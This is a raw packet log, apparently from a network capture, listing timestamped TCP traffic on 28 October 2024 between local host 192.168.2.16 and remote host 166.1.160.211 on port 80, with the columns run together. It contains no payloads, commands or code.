                                                                                                                                                              Oct 28, 2024 19:46:25.892199039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892199993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892235041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892272949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892286062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892308950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892352104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892431021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892462969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892513990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892528057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892566919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892616034 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892617941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892651081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892683983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892697096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.899034023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938385963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938437939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938488007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938519955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938554049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938587904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938591957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938591957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938618898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938622952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938673019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938695908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938747883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938795090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938796043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938828945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938863039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938870907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938898087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938941956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.938965082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.938997984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939043045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.939048052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939083099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939116955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939127922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.939151049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939186096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939193964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.939279079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939328909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.939328909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939363956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939399004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939414024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.939824104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939870119 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.939877987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939910889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.939955950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940002918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940035105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940068960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940080881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940104008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940150976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940294981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940390110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940424919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940442085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940476894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940510035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940526962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940546989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940581083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940594912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940645933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940679073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940700054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940712929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.940759897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.940964937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941019058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941052914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941063881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.941154957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941188097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941201925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.941221952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941256046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941260099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.941293001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941327095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941348076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.941407919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941442013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941453934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.941476107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.941526890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942011118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942064047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942097902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942115068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942133904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942167997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942189932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942251921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942287922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942300081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942404032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942454100 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942454100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942490101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942523003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942542076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942557096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.942605972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.942996025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943047047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943080902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943095922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.943156958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943191051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943206072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.943224907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943274021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.943373919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943408012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943442106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943456888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.943475962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943509102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943523884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.943543911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943592072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.943916082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.943969965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944003105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944020033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.944056034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944087982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944116116 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.944122076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944154978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944170952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.944190025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944226027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944241047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.944279909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944314003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944333076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.944346905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944396019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.944859982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.944977045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945027113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.945048094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945084095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945127010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.945135117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945167065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945202112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945216894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.945235968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945270061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.945287943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.985080957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.320980072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.327263117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502312899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502370119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502408028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502445936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502458096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502480984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502516985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502552032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502587080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502621889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502630949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502630949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502652884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502657890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502692938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502705097 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502728939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502763033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502779961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502803087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502840996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502855062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502875090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502909899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502922058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502943993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502990007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503204107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503259897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503297091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503308058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503379107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503413916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503426075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503449917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503490925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503504038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503525972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503560066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503572941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503593922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503642082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504009962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504044056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504077911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504090071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504132986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504167080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504179001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504201889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504236937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504249096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504297018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504331112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504345894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504365921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504400969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504410028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504436970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504482031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504909992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504925966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504942894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504966974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505024910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505042076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505057096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505065918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505074978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505096912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505247116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505264044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505281925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505290031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505300045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505319118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505322933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505358934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.547481060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547514915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547549963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547574043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.547610998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547663927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.553105116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553153992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553186893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553206921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.553220987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553247929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553262949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.558501959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558537006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558568001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.558569908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558604956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558619022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.558638096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558684111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.563834906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563868999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563903093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563920021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.563936949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563970089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563987970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.569252968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569305897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569320917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.569340944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569379091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569390059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.574726105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574759960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574788094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.574795008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574827909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574860096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574862003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.574906111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.580302954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580353975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580388069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580411911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.580423117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580471992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.585699081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585750103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585783005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585803986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.585818052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585865021 CET4972680192.168.2.16166.1.160.211
